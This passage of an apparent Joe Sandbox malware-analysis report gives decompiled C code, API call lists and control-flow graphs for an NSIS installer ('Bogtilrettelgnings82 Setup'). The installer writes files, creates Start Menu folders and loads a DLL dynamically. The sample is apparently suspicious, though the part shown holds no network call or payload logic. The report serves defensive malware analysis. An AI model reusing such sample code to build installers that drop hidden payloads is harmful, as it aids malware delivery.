						 *0x423768 =  *0x423768 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423768;
						goto L32;
					} else {
						E00405CDE(0x409bb0, 0x424000);
						E00405CDE(0x424000, _t83);
						E00405D00(_t75, 0x409bb0, _t83, "C:\Users\engineer\AppData\Roaming\Microsoft\Windows\Start Menu",  *((intOrPtr*)(_t85 - 0x10)));
						E00405CDE(0x424000, 0x409bb0);
						_t62 = E004054F2("C:\Users\engineer\AppData\Roaming\Microsoft\Windows\Start Menu",  *(_t85 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423768 =  &( *0x423768->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(_t83);
								_push(0xfffffffa);
								E00404FC9();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404FC9(0xffffffea,  *(_t85 - 8)); // executed
				 *0x423794 =  *0x423794 + 1;
				_t43 = E00402F1F(_t77,  *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 0x34), _t75, _t75); // executed
				 *0x423794 =  *0x423794 - 1;
				__eflags =  *(_t85 - 0x18) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405D00(_t75, _t80, _t83, _t83, 0xffffffee);
					} else {
						E00405D00(_t75, _t80, _t83, _t83, 0xffffffe9);
						lstrcatA(_t83,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(_t83);
					E004054F2();
					goto L29;
				}
				goto L33;
			}

















                                                                      0x0040173f
                                                                      0x00401746
                                                                      0x0040174f
                                                                      0x00401752
                                                                      0x00401755
                                                                      0x0040175a
                                                                      0x0040175b
                                                                      0x00401762
                                                                      0x0040177e
                                                                      0x00401764
                                                                      0x00401765
                                                                      0x00401765
                                                                      0x00401784
                                                                      0x0040178e
                                                                      0x0040178e
                                                                      0x00401792
                                                                      0x00401795
                                                                      0x0040179a
                                                                      0x0040179c
                                                                      0x0040179e
                                                                      0x004017a3
                                                                      0x004017a3
                                                                      0x004017ae
                                                                      0x004017ae
                                                                      0x004017bf
                                                                      0x004017c1
                                                                      0x004017c1
                                                                      0x004017c2
                                                                      0x004017c2
                                                                      0x004017c5
                                                                      0x004017c8
                                                                      0x004017cb
                                                                      0x004017cb
                                                                      0x004017d2
                                                                      0x004017e1
                                                                      0x004017e6
                                                                      0x004017e9
                                                                      0x004017ec
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004017ee
                                                                      0x004017f1
                                                                      0x0040184b
                                                                      0x00401850
                                                                      0x004015a8
                                                                      0x00402663
                                                                      0x00402663
                                                                      0x00402892
                                                                      0x00402895
                                                                      0x00402895
                                                                      0x00000000
                                                                      0x004017f3
                                                                      0x004017f9
                                                                      0x00401804
                                                                      0x00401811
                                                                      0x0040181c
                                                                      0x00401832
                                                                      0x00401832
                                                                      0x00401835
                                                                      0x00000000
                                                                      0x0040183b
                                                                      0x0040183b
                                                                      0x0040183c
                                                                      0x00401859
                                                                      0x0040289b
                                                                      0x0040289b
                                                                      0x0040289b
                                                                      0x0040183e
                                                                      0x0040183e
                                                                      0x0040183f
                                                                      0x00401492
                                                                      0x00402226
                                                                      0x00402226
                                                                      0x00402226
                                                                      0x0040183c
                                                                      0x00401835
                                                                      0x0040289d
                                                                      0x004028a1
                                                                      0x004028a1
                                                                      0x00401869
                                                                      0x0040186e
                                                                      0x0040187c
                                                                      0x00401881
                                                                      0x00401887
                                                                      0x0040188b
                                                                      0x0040188d
                                                                      0x00401895
                                                                      0x004018a1
                                                                      0x0040188f
                                                                      0x0040188f
                                                                      0x00401893
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00401893
                                                                      0x004018aa
                                                                      0x004018b0
                                                                      0x004018b2
                                                                      0x00000000
                                                                      0x004018b8
                                                                      0x004018b8
                                                                      0x004018bb
                                                                      0x004018d3
                                                                      0x004018bd
                                                                      0x004018c0
                                                                      0x004018c9
                                                                      0x004018c9
                                                                      0x004018d8
                                                                      0x004018dd
                                                                      0x00402221
                                                                      0x00000000
                                                                      0x00402221
                                                                      0x00000000

                                                                      APIs
                                                                      • lstrcatA.KERNEL32(00000000,00000000,13230,C:\Users\user\Vkstcentrene\unprotuberant\Benediktinerklostrets\Rehandles\Abortionist\Korses,00000000,00000000,00000031), ref: 0040177E
                                                                      • CompareFileTime.KERNEL32(-00000014,?,13230,13230,00000000,00000000,13230,C:\Users\user\Vkstcentrene\unprotuberant\Benediktinerklostrets\Rehandles\Abortionist\Korses,00000000,00000000,00000031), ref: 004017A8
                                                                        • Part of subcall function 00405CDE: lstrcpynA.KERNEL32(?,?,00000400,00403287,Bogtilrettelgnings82 Setup,NSIS Error), ref: 00405CEB
                                                                        • Part of subcall function 00404FC9: lstrlenA.KERNEL32(Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405002
                                                                        • Part of subcall function 00404FC9: lstrlenA.KERNEL32(00402C51,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405012
                                                                        • Part of subcall function 00404FC9: lstrcatA.KERNEL32(Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00402C51,00402C51,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000,00000000,00000000), ref: 00405025
                                                                        • Part of subcall function 00404FC9: SetWindowTextA.USER32(Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade), ref: 00405037
                                                                        • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040505D
                                                                        • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405077
                                                                        • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405085
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                      • String ID: 13230$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu$C:\Users\user\Vkstcentrene\unprotuberant\Benediktinerklostrets\Rehandles\Abortionist\Korses
                                                                      • API String ID: 1941528284-564645581
                                                                      • Opcode ID: 8f4d0c5f3dcbfcb15197cf1fb966cb8d0149284c43733f6f1e94ac9440d3b273
                                                                      • Instruction ID: 7db23f1b7129aac0a780206d539a17182f36eced295e71d03ce013e672f77a8a
                                                                      • Opcode Fuzzy Hash: 8f4d0c5f3dcbfcb15197cf1fb966cb8d0149284c43733f6f1e94ac9440d3b273
                                                                      • Instruction Fuzzy Hash: 3241E471904615BADB10BBA9DD46EAF3679EF01328F30823BF111F20E1D67C8A419A6D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00404FC9 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 607 404fc9-404fde 608 405094-405098 607->608 609 404fe4-404ff6 607->609 610 405001-40500d lstrlenA 609->610 611 404ff8-404ffc call 405d00 609->611 613 40502a-40502e 610->613 614 40500f-40501f lstrlenA 610->614 611->610 616 405030-405037 SetWindowTextA 613->616 617 40503d-405041 613->617 614->608 615 405021-405025 lstrcatA 614->615 615->613 616->617 618 405043-405085 SendMessageA * 3 617->618 619 405087-405089 617->619 618->619 619->608 620 40508b-40508e 619->620 620->608
                                                                      C-Code - Quality: 100%
                                                                      			E00404FC9(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x422ec4; // 0x1047c
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x423794;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405D00(0, _t39, 0x41f4c0, 0x41f4c0, _a4);
					}
					_t26 = lstrlenA(0x41f4c0);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x422ea8, 0x41f4c0); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41f4c0;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52); // executed
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41f4c0)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41f4c0, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                                      0x00404fcf
                                                                      0x00404fdb
                                                                      0x00404fde
                                                                      0x00404fe4
                                                                      0x00404ff0
                                                                      0x00404ff3
                                                                      0x00404ff6
                                                                      0x00404ffc
                                                                      0x00404ffc
                                                                      0x00405002
                                                                      0x0040500a
                                                                      0x0040500d
                                                                      0x0040502a
                                                                      0x0040502e
                                                                      0x00405037
                                                                      0x00405037
                                                                      0x00405041
                                                                      0x0040504a
                                                                      0x00405056
                                                                      0x0040505d
                                                                      0x00405061
                                                                      0x00405064
                                                                      0x00405077
                                                                      0x00405085
                                                                      0x00405085
                                                                      0x00405089
                                                                      0x0040508b
                                                                      0x0040508e
                                                                      0x00000000
                                                                      0x0040508e
                                                                      0x0040500f
                                                                      0x00405017
                                                                      0x0040501f
                                                                      0x00405025
                                                                      0x00000000
                                                                      0x00405025
                                                                      0x0040501f
                                                                      0x0040500d
                                                                      0x00405098

                                                                      APIs
                                                                      • lstrlenA.KERNEL32(Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405002
                                                                      • lstrlenA.KERNEL32(00402C51,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405012
                                                                      • lstrcatA.KERNEL32(Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00402C51,00402C51,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000,00000000,00000000), ref: 00405025
                                                                      • SetWindowTextA.USER32(Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade), ref: 00405037
                                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040505D
                                                                      • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405077
                                                                      • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405085
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                      • String ID: Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade
                                                                      • API String ID: 2531174081-4140740495
                                                                      • Opcode ID: 21a713ac71c9552ce9ec65dd84e6e61f028e4054551eda9b32f6ff81847b503c
                                                                      • Instruction ID: e00d580e889cbc391bca3c98a7377c16a9d81c786260b2fa8fb0dbec0f6b8e5c
                                                                      • Opcode Fuzzy Hash: 21a713ac71c9552ce9ec65dd84e6e61f028e4054551eda9b32f6ff81847b503c
                                                                      • Instruction Fuzzy Hash: 9F218C71900508BADF119FA9CD84ADFBFA9FF04354F14807AF948A6290C3798E419FA8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040303A Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 621 40303a-403063 GetTickCount 622 4031a4-4031ac call 402bda 621->622 623 403069-403094 call 4031cc SetFilePointer 621->623 628 4031ae-4031b3 622->628 629 403099-4030ab 623->629 630 4030ad 629->630 631 4030af-4030bd call 4031b6 629->631 630->631 634 4030c3-4030cf 631->634 635 403196-403199 631->635 636 4030d5-4030db 634->636 635->628 637 403106-403122 call 406109 636->637 638 4030dd-4030e3 636->638 644 403124-40312c 637->644 645 40319f 637->645 638->637 639 4030e5-403105 call 402bda 638->639 639->637 647 403160-403166 644->647 648 40312e-403144 WriteFile 644->648 646 4031a1-4031a2 645->646 646->628 647->645 649 403168-40316a 647->649 650 403146-40314a 648->650 651 40319b-40319d 648->651 649->645 652 40316c-40317f 649->652 650->651 653 40314c-403158 650->653 651->646 652->629 654 403185-403194 SetFilePointer 652->654 653->636 655 40315e 653->655 654->622 655->652
                                                                      C-Code - Quality: 94%
                                                                      			E0040303A(intOrPtr _a4) {
				long _v4;
				void* __ecx;
				intOrPtr _t12;
				intOrPtr _t13;
				signed int _t14;
				void* _t16;
				void* _t17;
				long _t18;
				int _t21;
				intOrPtr _t22;
				intOrPtr _t34;
				long _t35;
				intOrPtr _t37;
				void* _t39;
				long _t40;
				intOrPtr _t53;

				_t35 =  *0x41688c; // 0x44ff
				_t37 = _t35 -  *0x40a7f8 + _a4;
				 *0x4236ec = GetTickCount() + 0x1f4;
				if(_t37 <= 0) {
					L23:
					E00402BDA(1);
					return 0;
				}
				E004031CC( *0x41e89c);
				SetFilePointer( *0x40901c,  *0x40a7f8, 0, 0); // executed
				 *0x41e898 = _t37;
				 *0x416888 = 0;
				while(1) {
					_t12 =  *0x416890; // 0x82d61
					_t34 = 0x4000;
					_t13 = _t12 -  *0x41e89c;
					if(_t13 <= 0x4000) {
						_t34 = _t13;
					}
					_t14 = E004031B6(0x412888, _t34);
					if(_t14 == 0) {
						break;
					}
					 *0x41e89c =  *0x41e89c + _t34;
					 *0x40a818 = 0x412888;
					 *0x40a81c = _t34;
					L6:
					L6:
					if( *0x4236f0 != 0 &&  *0x423780 == 0) {
						_t22 =  *0x41e898; // 0x1be16
						 *0x416888 = _t22 -  *0x41688c - _a4 +  *0x40a7f8;
						E00402BDA(0);
					}
					 *0x40a820 = 0x40a888;
					 *0x40a824 = 0x8000; // executed
					_t16 = E00406109(0x40a800); // executed
					if(_t16 < 0) {
						goto L21;
					}
					_t39 =  *0x40a820; // 0x4101b9
					_t40 = _t39 - 0x40a888;
					if(_t40 == 0) {
						__eflags =  *0x40a81c; // 0x0
						if(__eflags != 0) {
							goto L21;
						}
						__eflags = _t34;
						if(_t34 == 0) {
							goto L21;
						}
						L17:
						_t18 =  *0x41688c; // 0x44ff
						if(_t18 -  *0x40a7f8 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40901c, _t18, 0, 0); // executed
						goto L23;
					}
					_t21 = WriteFile( *0x40901c, 0x40a888, _t40,  &_v4, 0); // executed
					if(_t21 == 0 || _t40 != _v4) {
						_push(0xfffffffe);
						L22:
						_pop(_t17);
						return _t17;
					} else {
						 *0x40a7f8 =  *0x40a7f8 + _t40;
						_t53 =  *0x40a81c; // 0x0
						if(_t53 != 0) {
							goto L6;
						}
						goto L17;
					}
					L21:
					_push(0xfffffffd);
					goto L22;
				}
				return _t14 | 0xffffffff;
			}



















                                                                      0x0040303e
                                                                      0x0040304b
                                                                      0x0040305e
                                                                      0x00403063
                                                                      0x004031a4
                                                                      0x004031a6
                                                                      0x00000000
                                                                      0x004031ac
                                                                      0x0040306f
                                                                      0x00403082
                                                                      0x00403088
                                                                      0x0040308e
                                                                      0x00403099
                                                                      0x00403099
                                                                      0x0040309e
                                                                      0x004030a3
                                                                      0x004030ab
                                                                      0x004030ad
                                                                      0x004030ad
                                                                      0x004030b6
                                                                      0x004030bd
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004030c3
                                                                      0x004030c9
                                                                      0x004030cf
                                                                      0x00000000
                                                                      0x004030d5
                                                                      0x004030db
                                                                      0x004030e5
                                                                      0x004030fb
                                                                      0x00403100
                                                                      0x00403105
                                                                      0x0040310b
                                                                      0x00403111
                                                                      0x0040311b
                                                                      0x00403122
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403124
                                                                      0x0040312a
                                                                      0x0040312c
                                                                      0x00403160
                                                                      0x00403166
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403168
                                                                      0x0040316a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040316c
                                                                      0x0040316c
                                                                      0x0040317f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040318e
                                                                      0x00000000
                                                                      0x0040318e
                                                                      0x0040313c
                                                                      0x00403144
                                                                      0x0040319b
                                                                      0x004031a1
                                                                      0x004031a1
                                                                      0x00000000
                                                                      0x0040314c
                                                                      0x0040314c
                                                                      0x00403152
                                                                      0x00403158
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040315e
                                                                      0x0040319f
                                                                      0x0040319f
                                                                      0x00000000
                                                                      0x0040319f
                                                                      0x00000000

                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 0040304F
                                                                        • Part of subcall function 004031CC: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EA4,?), ref: 004031DA
                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?,?,00402ECB,000000FF,00000000,00000000), ref: 00403082
                                                                      • WriteFile.KERNELBASE(090900000BA007700290000008484006C6C00000000DFDF00080000000015007800000000000000ED00848484000020000000000000E0006565000053535353003737000089000000002020000000BCBC000000670000006E00000000000F0000A100004B4B00000000000000CCCCCC00DFDF00767676008F00004B4B000000A9000,004101B9,00000000,00000000,00412888,00004000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?), ref: 0040313C
                                                                      • SetFilePointer.KERNELBASE(000044FF,00000000,00000000,00412888,00004000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?,?,00402ECB), ref: 0040318E
                                                                      Strings
                                                                      • 090900000BA007700290000008484006C6C00000000DFDF00080000000015007800000000000000ED00848484000020000000000000E0006565000053535353003737000089000000002020000000BCBC000000670000006E00000000000F0000A100004B4B00000000000000CCCCCC00DFDF00767676008F00004B4B000000A9000, xrefs: 00403094, 00403135
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: File$Pointer$CountTickWrite
                                                                      • String ID: 090900000BA007700290000008484006C6C00000000DFDF00080000000015007800000000000000ED00848484000020000000000000E0006565000053535353003737000089000000002020000000BCBC000000670000006E00000000000F0000A100004B4B00000000000000CCCCCC00DFDF00767676008F00004B4B000000A9000
                                                                      • API String ID: 2146148272-2221801228
                                                                      • Opcode ID: 21382e836d7c05a3e87e7c33a043faaf5ec86303859092ae4c974924d344ca23
                                                                      • Instruction ID: d344cd596d8d4dd0b43dc6914abeb17836bbf3c0912801dceac3b69aa1d0b3ec
                                                                      • Opcode Fuzzy Hash: 21382e836d7c05a3e87e7c33a043faaf5ec86303859092ae4c974924d344ca23
                                                                      • Instruction Fuzzy Hash: 7841C3729042019FD710AF29EE849663FFCF74835A711813BE414B72E0D7399D529B9E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00401F68 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 656 401f68-401f74 657 401f7a-401f90 call 4029fd * 2 656->657 658 40202f-402031 656->658 668 401f92-401f9d GetModuleHandleA 657->668 669 401f9f-401fad LoadLibraryExA 657->669 660 40217c-402181 call 401423 658->660 665 402892-4028a1 660->665 668->669 671 401faf-401fbc GetProcAddress 668->671 669->671 672 402028-40202a 669->672 673 401ffb-402000 call 404fc9 671->673 674 401fbe-401fc4 671->674 672->660 678 402005-402008 673->678 676 401fc6-401fd2 call 401423 674->676 677 401fdd-401ff4 call 100016da 674->677 676->678 686 401fd4-401fdb 676->686 680 401ff6-401ff9 677->680 678->665 681 40200e-402016 call 403707 678->681 680->678 681->665 687 40201c-402023 FreeLibrary 681->687 686->678 687->665
                                                                      C-Code - Quality: 60%
                                                                      			E00401F68(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x423798");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x423768 =  *0x423768 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E004029FD(0xfffffff0);
				 *(_t34 + 8) = E004029FD(1);
				if( *((intOrPtr*)(_t34 - 0x14)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404FC9(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x1c)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 0x34)), 0x400, 0x424000, 0x40a7b4, "`7B"); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x1c)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x18)) == _t27 && E00403707(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                                      0x00401f68
                                                                      0x00401f68
                                                                      0x00401f6d
                                                                      0x00401f74
                                                                      0x0040202f
                                                                      0x0040217c
                                                                      0x0040217c
                                                                      0x00402892
                                                                      0x00402895
                                                                      0x004028a1
                                                                      0x004028a1
                                                                      0x00401f83
                                                                      0x00401f8d
                                                                      0x00401f90
                                                                      0x00401f9f
                                                                      0x00401fa3
                                                                      0x00401fa9
                                                                      0x00401fad
                                                                      0x00402028
                                                                      0x00000000
                                                                      0x00402028
                                                                      0x00401faf
                                                                      0x00401fb8
                                                                      0x00401fbc
                                                                      0x00402000
                                                                      0x00401fbe
                                                                      0x00401fc1
                                                                      0x00401fc4
                                                                      0x00401ff4
                                                                      0x00401fc6
                                                                      0x00401fc9
                                                                      0x00401fd2
                                                                      0x00401fd4
                                                                      0x00401fd4
                                                                      0x00401fd2
                                                                      0x00401fc4
                                                                      0x00402008
                                                                      0x0040201d
                                                                      0x0040201d
                                                                      0x00000000
                                                                      0x00402008
                                                                      0x00401f93
                                                                      0x00401f99
                                                                      0x00401f9d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000

                                                                      APIs
                                                                      • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F93
                                                                        • Part of subcall function 00404FC9: lstrlenA.KERNEL32(Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405002
                                                                        • Part of subcall function 00404FC9: lstrlenA.KERNEL32(00402C51,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405012
                                                                        • Part of subcall function 00404FC9: lstrcatA.KERNEL32(Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00402C51,00402C51,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000,00000000,00000000), ref: 00405025
                                                                        • Part of subcall function 00404FC9: SetWindowTextA.USER32(Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade), ref: 00405037
                                                                        • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040505D
                                                                        • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405077
                                                                        • Part of subcall function 00404FC9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405085
                                                                      • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FA3
                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
                                                                      • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
